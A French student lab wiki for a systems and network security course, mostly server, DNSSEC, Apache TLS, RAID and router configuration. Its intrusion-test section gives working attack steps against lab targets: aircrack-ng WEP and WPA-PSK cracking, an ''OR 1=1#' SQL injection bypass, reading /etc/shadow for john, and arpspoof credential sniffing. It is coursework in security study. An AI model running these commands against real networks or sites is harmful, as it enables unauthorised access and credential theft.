&lt;br /&gt;
''Nous avons eu un problème lors de la signature du fichier de zone, pour cela nous avons dû rajouter le timeout dans les fichiers de clés :&lt;br /&gt;
    morillon.website. '''3600''' IN DNSKEY 257 3 5 AwEAAfVX0ANdFDm...&lt;br /&gt;
&lt;br /&gt;
Apparemment à cause de l'option -L absente lors de la création des clés.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.local pour changement du fichier de zone à charger :&lt;br /&gt;
    ... &lt;br /&gt;
    //file &amp;quot;/etc/bind/db.morillon.website&amp;quot;;&lt;br /&gt;
    file &amp;quot;/etc/bind/db.morillon.website.signed&amp;quot;;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Redémarrage du serveur bind9 avec la nouvelle configuration :&lt;br /&gt;
    service reload bind9&lt;br /&gt;
&lt;br /&gt;
Puis partage des clés KSK et ZSK avec gandi.net dans la zone registrar (utilisation d'un algorithme RSA/SHA1 (5))&lt;br /&gt;
&lt;br /&gt;
Lors d'un host -t any, nous obtenons :&lt;br /&gt;
    morillon.website has RRSIG record NSEC 5 2 86400 20210113121019 20201214121019 52512 morillon.website. nIhQAoZ568EQQ9eOl5H11UqnE49RW62604sey8RqnpVV1GWO4Rp5fkX4 7aOmVVljXVpnFvBfcfVYI430VHGKJUjUwSgSQSFFrLsKqETAp2PZFosH qEX1ml7c6U5SGpWdlkMtisLCxYfYn8/r2R25MZtrZsIsW543Zx6kXSzP 4CI=&lt;br /&gt;
    morillon.website has NSEC record mail.morillon.website. NS SOA MX RRSIG NSEC DNSKEY&lt;br /&gt;
    morillon.website has RRSIG record MX 5 2 86400 20210113121019 20201214121019 52512 morillon.website. GYKvgQe+6dfZkrevA3TXyJS82o77qWlRl/pNsE0I41Ku7FT1RgifPDll kXnqRl9G70iT4cRB9dNa/F+7RTcvY276in44lMkAzRlMWARG8+hYBhhq 5nvNN4kJpDZ7dKIpTc/wMu7SGiMZYKKrJOeK/pdarxI4ZHyqhDMiCW/X 9hE=&lt;br /&gt;
    morillon.website mail is handled by 100 mail.morillon.website.&lt;br /&gt;
    morillon.website has RRSIG record NS 5 2 86400 20210113121019 20201214121019 52512 morillon.website. RuAS5LH4UEmd+FIjzD522vwJcrGYlNuUuZYsDAFy0JiMGuOse5EKAWOi 01NWxfLAPGCDlj9Dj4QfyxSA+GhIJPEU25kcR44Nv/LQn1FsJZlQT8XM QkUnAXSlchrIlKg+XaSCTGjjfB1rE5Oba7PUwYgQ5CC7C7etvXegp2QV Ju0=&lt;br /&gt;
    morillon.website has RRSIG record SOA 5 2 86400 20210113121019 20201214121019 52512 morillon.website. i+0smnpl1ASGvURvV3lL/BuL6Zw/s3yjslMRUIKbOkE4tM/zgqF5RrTb gHOkj3PcZSSaO31O3vKUz6S0iPo/YWQvdaF0aHDcyvLQgCLiP6vpNwF+ mwOO821Jto39AM+3cuWCsytKECqKH4LoDMxkw/MUi6DJe40eAD8HEf2P 8iQ=&lt;br /&gt;
    morillon.website has SOA record ns1.morillon.website. postmaster.morillon.website. 2020120706 604800 86400 2419200 86400&lt;br /&gt;
    morillon.website has RRSIG record DNSKEY 5 2 3600 20210113121019 20201214121019 52512 morillon.website. VGQyJDSf38xOBJymFK/DYLO/UYPEoIspsqZpPPnX+nPjUdR5Tw3tILPT 5AfZWAChlgQ8AnfLzxum/znpKI66EbeqTHvg1J/FjMBvlsyyLjwqjn6w u7JzquC/fbpq4HsskLFgpl1Z1zNuQAJB9xBGOJR8BpCHBRc8ubp1tUzy I2k=&lt;br /&gt;
    morillon.website has RRSIG record DNSKEY 5 2 3600 20210113121019 20201214121019 59473 morillon.website. Tz3BwfoPt+loiqbWuQnbDdl57L6eXQ+dv+ZvXzcrvCSTXy/UKNRjs39d t6j6krwo4eZk6blXGgDEm93D67AmkQHmus9NYL9VgR0eG/NPHIodozzq aai4jXKwcOnk8O3d/nObyOERvGbnD9znUVGtgiUDCcY7UaXBogewFyCR Zxq69+FdFvmIXwriHHRRiaN/Bf4r/+djB46AcZEpbtvq1475BfJ6qYe/ VxW5odv1wcr9k8Sy/27LMbaHzdX9OWqdYLge3vfBRa8VMW+R57tx+M0p mtmOExUgc3mmnsVLP89L2M85MMTcbaup1RJIG4L33CaYEl9hOiaki4j8 CW5GHg==&lt;br /&gt;
    morillon.website has DNSKEY record 257 3 5 AwEAAfVX0ANdFDmDRKIBUMhso53F9LjZnc3lKHwHZHe3xiyLnFC+rQyc CQH+xg5g0UvDSLtoTFRtMiA4AyY6d8fywjmNFVluu64iDWyZkIVdiZLm XkfDdt4lz2+rxE1IkncbCYKkOk5cwkXYtxR/z/leOyZPX4i8Q1fhMfJG jUzNnZ1dATz0WGTb5qoGU9mEzVOH1WH4SkHc+acXkfBn6MtgR/DNJKDw 5huO3LMuA/ZyfwZU7lHhID97MMdpIwTIjd/nJLCjNY6rUP4OzZka7VjQ n/lOZ2UGMjOn+4QQqKDvmLohUOBsNFyY7PnSvsV9j5riNEZfuBx863QN 0PSBfK9cA4M=&lt;br /&gt;
    morillon.website has DNSKEY record 256 3 5 AwEAAaZUpNecSfAJ70amN3b4lcgpOAKXwbeJRogxxJEaqoSa0meQm6PY ZHAJFkxMMi78X+qVQeZr206VozCjPhysAWK6G45h/yY73Xzw1s0KzLwf L6FOhcn7KWzf2CIm6RfH5hwRLyuDriAaVVdKPxN/CkW9LIXRzm5LWSdz hqsZrhsz&lt;br /&gt;
    morillon.website name server ns6.gandi.net.&lt;br /&gt;
    morillon.website name server ns1.morillon.website.&lt;br /&gt;
&lt;br /&gt;
Cela fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
===Apache2 et sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;br /&gt;
&lt;br /&gt;
Une fois le .csr et le .key créés, nous transmettons à gandi.net le CSR afin de générer un certificat signé.&lt;br /&gt;
&lt;br /&gt;
Nous avons configué notre serveur pour recevoir des mails, pour cela, nous avons installé 2 paquets :&lt;br /&gt;
&lt;br /&gt;
    postfix&lt;br /&gt;
    bsd-mailx&lt;br /&gt;
&lt;br /&gt;
Puis nous avons ajouté un alias dans le fichier /etc/aliases&lt;br /&gt;
    admin:     root&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de renseigner l'adresse du serveur mail dans le fichier DNS /etc/bind/db.morillon.website&lt;br /&gt;
    @     IN    MX 100 mail&lt;br /&gt;
    mail  IN    CNAME ns1&lt;br /&gt;
    ns1   IN    A   *adresse ip publique*&lt;br /&gt;
&lt;br /&gt;
Grâce à&lt;br /&gt;
    mailx&lt;br /&gt;
&lt;br /&gt;
Nous pouvons vérifier la présence de mail sur notre serveur et recevoir la demande d'authentification de gandi pour générer le certificat.&lt;br /&gt;
&lt;br /&gt;
Une fois obtenue, nous avons 4 fichiers : .key (fichier private key) .csr (fichier certificate) .crt (certificat signé) et .pem (liste des certificats accordés aux autorités signant notre certificat)&lt;br /&gt;
&lt;br /&gt;
Nous configurons par la suite apache2 pour utiliser ces certificats, dans le terminal :&lt;br /&gt;
    a2enmod ssl&lt;br /&gt;
    a2enmod headers&lt;br /&gt;
    service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Maintenant, nous créons un fichier de configuration pour notre serveur:&lt;br /&gt;
    touch /etc/apache2/sites-available/morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
Contenant :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         Redirect permanent / https://www.morillon.website&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
    #Pour rediriger automatiquement les connexions http vers https&lt;br /&gt;
    &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
        ServerName morillon.website&lt;br /&gt;
        ServerAlias www.morillon.website&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/morillon.website&amp;quot;&lt;br /&gt;
         &amp;lt;Directory &amp;quot;var/www/morillon.website&amp;quot;&amp;gt;&lt;br /&gt;
            Options +FollowSymLinks&lt;br /&gt;
            AllowOverride all&lt;br /&gt;
            Require all granted&lt;br /&gt;
         &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.morillon.website.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.morillon.website.log combined&lt;br /&gt;
        #Paramètres de base pour notre site&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile &amp;quot;/home/certificates/morillon.website.crt&amp;quot;&lt;br /&gt;
        SSLCertificateKeyFile &amp;quot;/home/certificates/morillon.key&amp;quot;&lt;br /&gt;
        SSLCertificateChainFile &amp;quot;/home/certificates/GandiStandardSSLCA2.pem&amp;quot;&lt;br /&gt;
        #Activation de la sécurité TLS, emplacement des certificats, de la clé privée et des listes de certificats intermédiaires&lt;br /&gt;
        SSLProtocol -ALL +TLSv1 +TLSv1.1 +TLSv1.2&lt;br /&gt;
        SSLHonorCipherOrder On&lt;br /&gt;
        SSLCipherSuite ECDHE-RSA-AES128-SHA256:AES128-GCM-SHA256:HIGH:!MD5:!aNULL:!EDH:!RC4&lt;br /&gt;
        SSLCompression off&lt;br /&gt;
        #Quelques options de sécurité supplémentaires suites aux découvertes sur les failles TLS de 2014&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous avons désactivé les autres sites par défaut :&lt;br /&gt;
    a2dissite 000-default.conf&lt;br /&gt;
    a2dissite default-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Et activons notre site:&lt;br /&gt;
    a2ensite morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
===Encryption Clé USB===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;br /&gt;
&lt;br /&gt;
===Elevation de privilège sur kernel linux===&lt;br /&gt;
&lt;br /&gt;
Pour tester l'élevation de privilège, nous utilisons la faille CVE_2016_0728 qui fonctionne sur les kernels entre 3.6 et 3.18&lt;br /&gt;
Identifié par la team Perception Point&lt;br /&gt;
http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/&lt;br /&gt;
&lt;br /&gt;
Création d'un VM avec KVM d'une debian jessie pour test sur zabeth21.&lt;br /&gt;
&lt;br /&gt;
===Raid 5 Logiciel===&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le raid 5 logiciel, on crée tout d'abord 3 partitions virtuelles via lvcreate:&lt;br /&gt;
    lvcreate -L1G -n JDDTTR5* storage&lt;br /&gt;
&lt;br /&gt;
Ensuite on les lie à la VM dans le fichier /etc/xen/morillon.cfg comme pour les disques home et var.&lt;br /&gt;
&lt;br /&gt;
Après redémarrage de la VM, on installe le paquet mdadm et on crée un raid 5 sur les 3 nouvelles partitions :&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvde /dev/xvdf /dev/xvdg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier la création grâce à :&lt;br /&gt;
    cat /proc/mdstat&lt;br /&gt;
 &lt;br /&gt;
qui nous renvoie :&lt;br /&gt;
    Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
    md0 : active raid5 xvdg[3] xvdf[1] xvde[0]&lt;br /&gt;
         2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Lors de la désactivation d'un des disques du raid, les données restent accessibles par reconstruction de la partie manquante à partir de 2 parties existantes ou d'une partie et d'une clé correspondante.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
&lt;br /&gt;
Le but dans cette étant de permettre à la borne WiFi d'être controlé par WPA2-EAP,&lt;br /&gt;
&lt;br /&gt;
nous avons en sorte que l'identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire&lt;br /&gt;
&lt;br /&gt;
Pour ce faire :&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connecté par ssh à notre point d'accès&lt;br /&gt;
 ssh root@10.60.100.10 -c aes128-cbc&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de nous connecter sur le point d'accès wifi-ima5&lt;br /&gt;
&lt;br /&gt;
Une fois dessus nous avons effectué les commandes suivantes :&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc&amp;gt;en&lt;br /&gt;
 wifi-ima5sc# (Après avoir tapé le mot de passe)&lt;br /&gt;
 wifi-ima5sc# config-term&lt;br /&gt;
 wifi-ima5sc(config)# aaa new-model&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group6 group radius_group6&lt;br /&gt;
 wifi-ima5sc(config-sg-radius)# radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secret_group6&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group6&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid morillon&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan306&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group6&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group6&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid Guest mode&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 306 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 306 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# ssid morillon&lt;br /&gt;
 &lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.6&lt;br /&gt;
 wifi-ima5sc(config-subif)#encapsulation dot1Q 6&lt;br /&gt;
 wifi-ima5sc(config-subif)#bridge-group 6&lt;br /&gt;
&lt;br /&gt;
===Configuration VRPP===&lt;br /&gt;
&lt;br /&gt;
Sur le routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 (config)# vlan 306&lt;br /&gt;
 (config-if)# vrrp 46 ip 10.60.106.254&lt;br /&gt;
 (config-if)# vrrp 46 preempt&lt;br /&gt;
 (config-if)# vrrp 46 priority 110&lt;br /&gt;
&lt;br /&gt;
Sur le routeur C9200&lt;br /&gt;
&lt;br /&gt;
 (config)# vlan 306&lt;br /&gt;
 (config-if)# vrrp 46 address-family ipv4&lt;br /&gt;
 (config-if-vrrp)# address 10.60.106.254&lt;br /&gt;
 (config-if-vrrp)# preempt&lt;br /&gt;
 (config-if-vrrp)# vrrpv2&lt;br /&gt;
&lt;br /&gt;
===Configuration IPv6===&lt;br /&gt;
&lt;br /&gt;
Afin d'effectuer la configuration IPv6 nous avons procédé aux étapes suivantes :&lt;br /&gt;
&lt;br /&gt;
Sur le routeur 6509-E :&lt;br /&gt;
&lt;br /&gt;
 (config)# int vlan 306&lt;br /&gt;
 (config-if)# no shut&lt;br /&gt;
 (config-if)# ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
 (config-if)# ipv6 enable&lt;br /&gt;
 (config-if)# ipv6 address 2001:660:4401:60b8::0/64 eui-64&lt;br /&gt;
 (config-if)# ipv6 nd prefix 2001:660:4401:60b8::0/64 1000 900&lt;br /&gt;
 (config-if)# ipv6 nd router-preference High&lt;br /&gt;
&lt;br /&gt;
Sur le routeur C9200 :&lt;br /&gt;
&lt;br /&gt;
 (config)#int vlan 306&lt;br /&gt;
 (config-if)#no shut&lt;br /&gt;
 (config-if)#ip address 10.60.106.2 255.255.255.0&lt;br /&gt;
 (config-if)#ipv6 enable&lt;br /&gt;
 (config-if)#ipv6 address 2001:660:4401:60b8::0/64 eui-64&lt;br /&gt;
 (config-if)#ipv6 nd prefix 2001:660:4401:60b8::0/64 1000 900&lt;br /&gt;
 (config-if)#ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Notre machine arrive à recupérer une adresse IP&lt;br /&gt;
&lt;br /&gt;
 IMA5sc-R1#sh ip dhcp bin               &lt;br /&gt;
 IMA5sc-R1#sh ip dhcp binding &lt;br /&gt;
 IP address       Client-ID/	 	 Lease expiration        Type&lt;br /&gt;
 Hardware address&lt;br /&gt;
 10.60.106.100    0146.f879.9094.cf       Jun 01 2000 04:53 AM    Automatic&lt;br /&gt;
 IMA5sc-R1#ping 10.60.106.100&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54653</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54653"/>
				<updated>2020-12-14T18:35:57Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
==== Intrusion sur un serveur d’application Web ====&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette intrusion est de réussir à trouver un mot de passe sur le site honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Pour cela, plusieurs techniques ont été utilisées notamment les méthodes d'injection ou d'exploration de système fichiers&lt;br /&gt;
&lt;br /&gt;
La première étape consistait à utitliser la méthode d'injection en tapant sur http://honey.plil.info/ l'instruction &lt;br /&gt;
 Identifiant : 'OR 1=1#&lt;br /&gt;
 Mot de passe : 'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis d'obtenir le mot de passe admin de la page http://honey.plil.info/index.php&lt;br /&gt;
&lt;br /&gt;
 admin	*****	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Une fois connecté avec les identifiants administrateurs que nous venions de récupérer,&lt;br /&gt;
&lt;br /&gt;
nous avons utilisé la technique de parcours de fichier.&lt;br /&gt;
&lt;br /&gt;
On retrouver ainsi en créant le fichier  /etc/phpmyadmin/config-db.php&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de récupérer le fichier config-db.php&lt;br /&gt;
&lt;br /&gt;
Voici le contenu du fichier :&lt;br /&gt;
&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='*****';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306'; &lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
On disposait ainsi du mot de passe ainsi que de l'identifiant de la page http://honey.plil.info/phpmyadmin/&lt;br /&gt;
&lt;br /&gt;
en clair&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connectés en root &lt;br /&gt;
&lt;br /&gt;
Et nous avons obtenus le mot de passe au niveau de l'arborescence test/&lt;br /&gt;
&lt;br /&gt;
Arrivé à cette étape nous nous sommes connectés en ssh sur la machine physique&lt;br /&gt;
 ssh rex@honey.plil.info &lt;br /&gt;
 mot de passe : ****&lt;br /&gt;
&lt;br /&gt;
On a installé l'utilitaire shadow&lt;br /&gt;
&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
touch file&lt;br /&gt;
... Add first line in fil&lt;br /&gt;
.... Uncrypt with john&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Brute-force sur WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
Pour commencer, la carte passe en mode monitor :&lt;br /&gt;
    airmon-ng start wlan0&lt;br /&gt;
&lt;br /&gt;
Puis une analyse des réseaux wifi disponible est effectuée :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On sélectionne notre réseau wifi (ici kracotte 6) avec son adresse MAC&lt;br /&gt;
    airodump-ng -c 3 --bssid 00:14:1B:60:8C:25 -w /home/pifou/Desktop/kracotte6 wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Handshaked_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Lorsque le handshake est obtenu, on compare grâce à un dictionnaire et la commande le fichier .cap récupéré: &lt;br /&gt;
     aicrack-ng -a2 -b 00:14:1B:60:8C:25 -w dico.txt kracotte06-02.cap&lt;br /&gt;
&lt;br /&gt;
Pour créer le dictionnaire, on utilise la commande crunch (comme on sait que le mot de passe est sur 8 caractères et forcément un nombre)&lt;br /&gt;
    crunch 8 8 0123456789 -o ./dico.txt&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_working_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Finalement, après un peu moins d'1h d'attente :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_done_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
==== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ====&lt;br /&gt;
Dans cette partie nous allons effectuer une attaque de type &amp;quot;homme du milieu&amp;quot; en faisant passé notre ordinateur pour la passerelle.&lt;br /&gt;
&lt;br /&gt;
Nous l'avons réalisé en ces étapes :&lt;br /&gt;
 1. Installation du paquetage dsniff sur notre ordinateur &lt;br /&gt;
 2. Modification du fichier /proc/sys/net/ipv4/ip_forward à 1&lt;br /&gt;
 3. Dans le terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 4. Dans un autre terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 5. Ouverture de wireshark sur l'eeepc et filtrage des paquets capturés sur le type hit&lt;br /&gt;
 6. Ouverture d'un site http (http://fabricarium.polytech-lille.fr)&lt;br /&gt;
 7. Observation sur wireshark des paquets (méthode GET)&lt;br /&gt;
 8. En essayant de nous connecter en remplissant les identifiants, nous avons eu ce résultat :&lt;br /&gt;
&lt;br /&gt;
 892    27.057577298    172.26.145.70    193.48.57.233    HTTP    1118    GET http://fabricarium-old.polytech-lille.fr/ HTTP/1.1&lt;br /&gt;
&lt;br /&gt;
 987    38.734920206    172.26.145.70    193.48.57.233    HTTP    1383    POST http://fabricarium-old.polytech-lille.fr/users/sign_in.json HTTP/1.1  (application/json)&lt;br /&gt;
&lt;br /&gt;
 995    39.815022272    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 1523    99.814090449    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 Frame 987: 1383 bytes on wire (11064 bits), 1383 bytes captured (11064 bits) on interface 0&lt;br /&gt;
 Ethernet II, Src: IntelCor_8f:f7:d3 (00:15:17:8f:f7:d3), Dst: HewlettP_01:ed:ce (5c:b9:01:01:ed:ce)&lt;br /&gt;
 Internet Protocol Version 4, Src: 172.26.145.70, Dst: 193.48.57.233&lt;br /&gt;
 Transmission Control Protocol, Src Port: 53876, Dst Port: 3128, Seq: 14532, Ack: 11925, Len: 1317&lt;br /&gt;
 Hypertext Transfer Protocol&lt;br /&gt;
 JavaScript Object Notation: application/json&lt;br /&gt;
    Object&lt;br /&gt;
        Member Key: user&lt;br /&gt;
            Object&lt;br /&gt;
                Member Key: email&lt;br /&gt;
                    String value: mail@mail.com&lt;br /&gt;
                    Key: email&lt;br /&gt;
                Member Key: password&lt;br /&gt;
                    String value: motdepasse&lt;br /&gt;
                    Key: password&lt;br /&gt;
            Key: user&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
